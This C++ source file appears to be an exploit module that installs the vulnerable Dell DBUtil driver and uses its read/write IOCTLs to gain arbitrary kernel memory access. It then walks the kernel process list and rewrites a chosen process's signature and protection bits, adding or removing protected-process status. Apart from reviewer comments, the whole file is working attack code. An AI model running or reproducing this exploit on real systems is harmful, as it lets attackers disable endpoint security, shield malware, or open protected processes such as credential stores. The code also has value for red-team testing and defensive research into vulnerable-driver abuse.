#include <Windows.h>
#include <Psapi.h>
#include <newdev.h>

#include <filesystem>
#include <sstream>
#include <string>
#include <system_error>
#include <vector>

#include "common.h"

namespace
{
    // Win32 device path opened by getDeviceHandle().
    const std::string s_driverHandle = "\\\\.\\DBUtil_2_5";

    // IOCTL codes passed to DeviceIoControl by writePrimitive() / readPrimitive().
    constexpr uint32_t s_write_ioctl = 0x9b0c1ec8;
    constexpr uint32_t s_read_ioctl = 0x9b0c1ec4;

    // Byte offsets of fields inside a kernel process object. They are supplied
    // by the caller (see parse_params) rather than hard-coded.
    // NOTE(review): presumably EPROCESS field offsets for the running Windows
    // build, which differ between builds — confirm against the caller.
    struct Offsets
    {
        // Offset of the process-id field compared against the target PID.
        uint64_t UniqueProcessIdOffset;
        // Offset of the list link used to walk from one process object to the next.
        uint64_t ActiveProcessLinksOffset;
        // Offset of the 8-byte word whose low three bytes hold the signature /
        // protection bits that changeProcessProtection rewrites.
        uint64_t SignatureLevelOffset;
    };

    // Reads one 64-bit value at p_address (callers pass kernel addresses) via
    // the DBUtil read IOCTL on p_device.
    //
    // Buffer layout as used here: input slot 1 carries the address, and output
    // slot 3 receives the value read; the other slots are zero. The layout is
    // presumably dictated by the driver — do not reorder.
    //
    // The DeviceIoControl result is not checked. Because the response buffer is
    // zero-initialized, a failed IOCTL returns 0, so callers treat 0 as failure.
    uint64_t readPrimitive(HANDLE p_device, uint64_t p_address)
    {
        uint64_t read_data[4] = { 0, p_address, 0, 0 };
        uint64_t response[4] = { };
        DWORD dwBytesReturned = 0;
        DeviceIoControl(p_device, s_read_ioctl, &read_data, sizeof(read_data), &response, sizeof(response), &dwBytesReturned, 0);
        return response[3];
    }

    // Writes the 64-bit value p_data to p_address (callers pass kernel
    // addresses) via the DBUtil write IOCTL on p_device.
    //
    // Buffer layout as used here: slot 1 carries the address and slot 3 the
    // value; the other slots are zero. Presumably dictated by the driver — do
    // not reorder.
    //
    // The DeviceIoControl result is not checked, so a failed write is silent.
    void writePrimitive(HANDLE p_device, uint64_t p_address, uint64_t p_data)
    {
        uint64_t write_data[4] = { 0, p_address, 0, p_data };
        uint64_t response[4] = { };
        DWORD bytesReturned = 0;
        DeviceIoControl(p_device, s_write_ioctl, &write_data, sizeof(write_data), &response, sizeof(response), &bytesReturned, 0);
    }

    // Opens the DBUtil device (s_driverHandle) for read/write access and stores
    // the handle in p_handle.
    // Returns true on success. On failure it logs GetLastError(), leaves
    // p_handle == INVALID_HANDLE_VALUE, and returns false.
    bool getDeviceHandle(HANDLE& p_handle)
    {
        const DWORD desiredAccess = GENERIC_READ | GENERIC_WRITE;
        p_handle = CreateFileA(s_driverHandle.c_str(), desiredAccess, 0 /* no sharing */, nullptr,
                               OPEN_EXISTING, 0, nullptr);

        const bool opened = (p_handle != INVALID_HANDLE_VALUE);
        if (!opened)
        {
            dprintf("[!] Failed to get a handle to %s: %u", s_driverHandle.c_str(), GetLastError());
        }
        return opened;
    }

    // Returns the load address of the first image reported by
    // EnumDeviceDrivers, or 0 if the enumeration fails or returns no entries.
    // NOTE(review): callers treat this as the ntoskrnl base, which relies on the
    // kernel image being the first entry — confirm on the target system.
    uint64_t getKernelBaseAddr()
    {
        // First call only queries the required buffer size, in bytes.
        DWORD needed = 0;
        if (!EnumDeviceDrivers(nullptr, 0, &needed) || needed < sizeof(LPVOID))
        {
            return 0;
        }

        // The vector owns the buffer, so no manual malloc/free is needed.
        std::vector<LPVOID> bases(needed / sizeof(LPVOID));
        const DWORD capacity = static_cast<DWORD>(bases.size() * sizeof(LPVOID));
        DWORD written = 0;
        if (!EnumDeviceDrivers(bases.data(), capacity, &written) || written < sizeof(LPVOID))
        {
            return 0;
        }

        return reinterpret_cast<uint64_t>(bases[0]);
    }

    // Returns the value stored in the kernel's PsInitialSystemProcess export,
    // read through the driver. Presumably this is the address of the System
    // process object, which is how changeProcessProtection uses it.
    // Returns 0 on any failure.
    //
    // The export's offset (RVA) is computed from a user-mode mapping of
    // ntoskrnl.exe: the export address minus the module base. That offset is
    // then added to the live kernel base from getKernelBaseAddr().
    uint64_t getPsInitialSystemProcessAddress(HANDLE p_device)
    {
        const auto NtoskrnlBaseAddress = getKernelBaseAddr();
        dprintf("[+] Ntoskrnl base address: %llx", NtoskrnlBaseAddress);
        if (NtoskrnlBaseAddress == 0)
        {
            // Adding an offset to a zero base would read a meaningless address.
            return 0;
        }

        // Locating PsInitialSystemProcess address
        HMODULE Ntoskrnl = LoadLibraryA("ntoskrnl.exe");
        if (Ntoskrnl == NULL)
        {
            return 0;
        }

        const FARPROC exportAddress = GetProcAddress(Ntoskrnl, "PsInitialSystemProcess");
        if (exportAddress == NULL)
        {
            // Without the export, the subtraction below would produce a wild offset.
            FreeLibrary(Ntoskrnl);
            return 0;
        }

        // Compute the offset before FreeLibrary invalidates the mapping.
        const uint64_t PsInitialSystemProcessOffset =
            reinterpret_cast<uint64_t>(exportAddress) - reinterpret_cast<uint64_t>(Ntoskrnl);
        FreeLibrary(Ntoskrnl);

        return readPrimitive(p_device, NtoskrnlBaseAddress + PsInitialSystemProcessOffset);
    }

    // Walks the circular process list, starting from the process object at
    // p_psInitialSystemProcessAddress. Returns the address of the first object
    // whose id field (at UniqueProcessIdOffset) equals p_targetPID, or 0 if no
    // object matches or a link read fails.
    //
    // Each link at ActiveProcessLinksOffset points at the same link field of the
    // next object, so subtracting the offset recovers that object's base.
    uint64_t getTargetProcessAddress(HANDLE p_device, Offsets p_offsets, uint64_t p_psInitialSystemProcessAddress, uint64_t p_targetPID)
    {
        // Find our process in active process list
        const uint64_t head = p_psInitialSystemProcessAddress + p_offsets.ActiveProcessLinksOffset;
        uint64_t current = head;

        do
        {
            const uint64_t processAddress = current - p_offsets.ActiveProcessLinksOffset;
            const uint64_t uniqueProcessId = readPrimitive(p_device, processAddress + p_offsets.UniqueProcessIdOffset);
            if (uniqueProcessId == p_targetPID)
            {
                return processAddress;
            }

            // Follow the first qword of the link field (presumably the forward link).
            current = readPrimitive(p_device, current);

            // readPrimitive yields 0 when the IOCTL fails. Continuing would
            // compute 0 - offset and keep reading garbage, so stop here.
            if (current == 0)
            {
                break;
            }
        } while (current != head);

        // oh no
        return 0;
    }

    // Performs the protection change over an already-open device handle.
    // Split out of changeProcessProtection so that the handle is closed in
    // exactly one place regardless of which step fails.
    bool changeProcessProtectionOnDevice(HANDLE p_device, uint64_t p_targetPID, const Offsets& p_offsets, bool p_protect)
    {
        const uint64_t PsInitialSystemProcessAddress = getPsInitialSystemProcessAddress(p_device);
        if (PsInitialSystemProcessAddress == 0)
        {
            dprintf("[-] Failed to resolve PsInitialSystemProcess");
            return false;
        }

        const uint64_t targetProcessAddress = getTargetProcessAddress(p_device, p_offsets, PsInitialSystemProcessAddress, p_targetPID);
        if (targetProcessAddress == 0)
        {
            dprintf("[-] Failed to find the target process");
            return false;
        }

        // read in the current protection bits, mask them out, and write it back
        const uint64_t protectionAddress = targetProcessAddress + p_offsets.SignatureLevelOffset;
        uint64_t flags = readPrimitive(p_device, protectionAddress);
        dprintf("[+] Current SignatureLevel, SectionSignatureLevel, Type, Audit, and Signer bits (plus 5 bytes): %llx", flags);

        // Clear the low three bytes: SignatureLevel, SectionSignatureLevel, and
        // the Type/Audit/Signer byte, as listed in the log line above. The upper
        // five bytes ("plus 5 bytes") are written back unchanged.
        flags &= 0xffffffffff000000;

        if (p_protect)
        {
            // wintcb / protected: 0x3f into both signature-level bytes and 0x62
            // into the Type/Audit/Signer byte.
            flags |= 0x623f3f;
        }

        dprintf("[+] Writing flags back as: %llx", flags);
        writePrimitive(p_device, protectionAddress, flags);
        return true;
    }

    // Opens the DBUtil device and sets (p_protect == true) or clears
    // (p_protect == false) the protection bits of the process with id targetPID.
    // Returns false if the device cannot be opened, the process list cannot be
    // resolved, or the target process is not found.
    bool changeProcessProtection(uint64_t targetPID, Offsets offsets, bool p_protect)
    {
        HANDLE Device = INVALID_HANDLE_VALUE;
        if (!getDeviceHandle(Device))
        {
            return false;
        }

        const bool result = changeProcessProtectionOnDevice(Device, targetPID, offsets, p_protect);
        CloseHandle(Device);
        return result;
    }

    // Undoes a partially completed driver2Setup. It removes the device element
    // if it was already registered, destroys the device-information list, and
    // resets p_devInfo to INVALID_HANDLE_VALUE.
    void driver2SetupRollback(HDEVINFO& p_devInfo, SP_DEVINFO_DATA& p_deviceInfoData, bool p_registered)
    {
        if (p_registered)
        {
            SetupDiRemoveDevice(p_devInfo, &p_deviceInfoData);
        }
        SetupDiDestroyDeviceInfoList(p_devInfo);
        p_devInfo = INVALID_HANDLE_VALUE;
    }

    // Creates a device element with hardware ID "ROOT\DBUtilDrv2", registers it,
    // and installs the driver described by the INF file at p_infPath onto it.
    //
    // On success, p_devInfo / p_deviceInfoData describe the new device; release
    // them with driver2Remove. On failure, the failing call is logged, any device
    // element or device-information list created here is released, and false is
    // returned.
    bool driver2Setup(HDEVINFO& p_devInfo, SP_DEVINFO_DATA& p_deviceInfoData, const char* p_infPath)
    {
        // Resolve the device setup class named by the INF.
        GUID guid = {};
        char classname[255] = { };
        if (!SetupDiGetINFClassA(p_infPath, &guid, &(classname[0]), sizeof(classname), NULL))
        {
            dprintf("[-] SetupDiGetINFClassA failed: %u", GetLastError());
            return false;
        }

        p_devInfo = SetupDiCreateDeviceInfoList(&guid, NULL);
        if (INVALID_HANDLE_VALUE == p_devInfo)
        {
            dprintf("[-] SetupDiCreateDeviceInfoList failed: %u", GetLastError());
            return false;
        }

        // From here on, every failure path must release p_devInfo. dprintf runs
        // first so that GetLastError() is captured before the cleanup calls.
        p_deviceInfoData.cbSize = sizeof(SP_DEVINFO_DATA);
        if (!SetupDiCreateDeviceInfoA(p_devInfo, classname, &guid, NULL, NULL, DICD_GENERATE_ID, &p_deviceInfoData))
        {
            dprintf("[-] SetupDiCreateDeviceInfoA failed: %u", GetLastError());
            driver2SetupRollback(p_devInfo, p_deviceInfoData, false);
            return false;
        }

        // The hardware ID property is a REG_MULTI_SZ. The explicit "\x00" plus
        // the literal's implicit terminator supply the required double NUL, and
        // sizeof(prop_buff) counts both.
        char prop_buff[] = "ROOT\\DBUtilDrv2\x00";
        if (!SetupDiSetDeviceRegistryPropertyA(p_devInfo, &p_deviceInfoData, SPDRP_HARDWAREID, reinterpret_cast<const BYTE*>(prop_buff), sizeof(prop_buff)))
        {
            dprintf("[-] SetupDiSetDeviceRegistryPropertyA failed:  %u", GetLastError());
            driver2SetupRollback(p_devInfo, p_deviceInfoData, false);
            return false;
        }

        if (!SetupDiCallClassInstaller(DIF_REGISTERDEVICE, p_devInfo, &p_deviceInfoData))
        {
            dprintf("[-] SetupDiCallClassInstaller failed:  %u", GetLastError());
            driver2SetupRollback(p_devInfo, p_deviceInfoData, false);
            return false;
        }

        // The device is now registered, so a failure below must also remove it.
        // NOTE(review): the reboot-required flag reported in `restart` is ignored.
        BOOL restart = 0;
        if (!UpdateDriverForPlugAndPlayDevicesA(NULL, prop_buff, p_infPath, INSTALLFLAG_FORCE | INSTALLFLAG_NONINTERACTIVE, &restart))
        {
            dprintf("[-] UpdateDriverForPlugAndPlayDevicesA failed:  %u", GetLastError());
            driver2SetupRollback(p_devInfo, p_deviceInfoData, true);
            return false;
        }

        dprintf("[+] Driver installed!");
        return true;
    }

    // Removes the device created by driver2Setup and releases its
    // device-information list. It does nothing for a NULL or
    // INVALID_HANDLE_VALUE handle; otherwise p_devInfo is reset to
    // INVALID_HANDLE_VALUE afterwards.
    void driver2Remove(HDEVINFO& p_devInfo, SP_DEVINFO_DATA& p_deviceInfoData)
    {
        if (p_devInfo == INVALID_HANDLE_VALUE || p_devInfo == NULL)
        {
            return;
        }

        dprintf("[+] Removing device");
        if (!SetupDiRemoveDevice(p_devInfo, &p_deviceInfoData))
        {
            dprintf("[-] SetupDiRemoveDevice failed: %u", GetLastError());
        }

        // SetupDiRemoveDevice does not free the list itself; without this the
        // HDEVINFO handle leaks.
        SetupDiDestroyDeviceInfoList(p_devInfo);
        p_devInfo = INVALID_HANDLE_VALUE;
    }

    // Splits p_params on ',' into exactly six fields, in this order:
    //   driver directory, pid, enable flag ("1" enables, anything else disables),
    //   unique process id offset, active process links offset, signature level offset.
    // The numeric fields are parsed with std::stoull (decimal).
    // Returns false if there are not exactly six fields or a numeric field fails
    // to parse. Outputs assigned before a parse failure keep their new values.
    // NOTE(review): std::stoull accepts a numeric prefix, so "12abc" parses as 12
    // and "0x440" parses as 0. Callers must pass plain decimal numbers.
    bool parse_params(std::string p_params, std::string& p_path_str, uint64_t& p_pid, bool& p_enable, Offsets& p_offsets)
    {
        std::vector<std::string> fields;
        std::stringstream tokenizer(p_params);

        // A freshly constructed stream is always good(), so a do/while is
        // equivalent to checking good() first. A trailing empty field (e.g.
        // after a final ',') is kept.
        do
        {
            std::string field;
            std::getline(tokenizer, field, ',');
            fields.push_back(field);
        } while (tokenizer.good());

        const bool wrongFieldCount = (fields.size() != 6);
        if (wrongFieldCount)
        {
            return false;
        }

        p_path_str.assign(fields[0]);
        p_enable = (fields[2] == "1");

        try
        {
            p_pid = stoull(fields[1]);
            p_offsets.UniqueProcessIdOffset = stoull(fields[3]);
            p_offsets.ActiveProcessLinksOffset = stoull(fields[4]);
            p_offsets.SignatureLevelOffset = stoull(fields[5]);
        }
        catch (const std::exception&)
        {
            // invalid_argument / out_of_range from stoull
            return false;
        }

        return true;
    }
}

// Module entry point. params is a comma-separated list:
//   "<driver dir>,<pid>,<1|0>,<unique process id offset>,<active process links offset>,<signature level offset>"
// It installs the driver from "<driver dir>\dbutildrv2.inf", sets (1) or
// clears (0) the protection of <pid>, and then removes the device again.
// Returns EXIT_SUCCESS only if the protection change succeeded.
int exploit(const char* params)
{
    if (params == NULL)
    {
        dprintf("[!] No params passed to the module.");
        return EXIT_FAILURE;
    }

    std::string path_str;
    uint64_t pid = 0;
    bool enable = false;
    Offsets offsets = { 0, 0, 0 };
    if (!parse_params(params, path_str, pid, enable, offsets))
    {
        dprintf("[!] Failed to parse the module params.");
        return EXIT_FAILURE;
    }

    path_str.append("\\dbutildrv2.inf");

    // The error_code overload reports filesystem errors as "not found" instead
    // of throwing std::filesystem::filesystem_error out of the entry point.
    std::error_code existsError;
    if (!std::filesystem::exists(path_str, existsError))
    {
        dprintf("[!] Could not find the driver's inf file in the provided directory");
        return EXIT_FAILURE;
    }

    HDEVINFO devInfo = INVALID_HANDLE_VALUE;
    SP_DEVINFO_DATA deviceInfoData = { };
    if (!driver2Setup(devInfo, deviceInfoData, path_str.c_str()))
    {
        return EXIT_FAILURE;
    }

    // Always remove the device, even when the protection change failed, and
    // report the real outcome to the caller.
    const bool changed = changeProcessProtection(pid, offsets, enable);
    driver2Remove(devInfo, deviceInfoData);

    return changed ? EXIT_SUCCESS : EXIT_FAILURE;
}
